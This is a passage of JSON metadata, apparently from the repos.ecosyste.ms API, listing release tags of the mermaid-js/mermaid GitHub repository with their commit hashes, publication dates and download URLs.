34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e470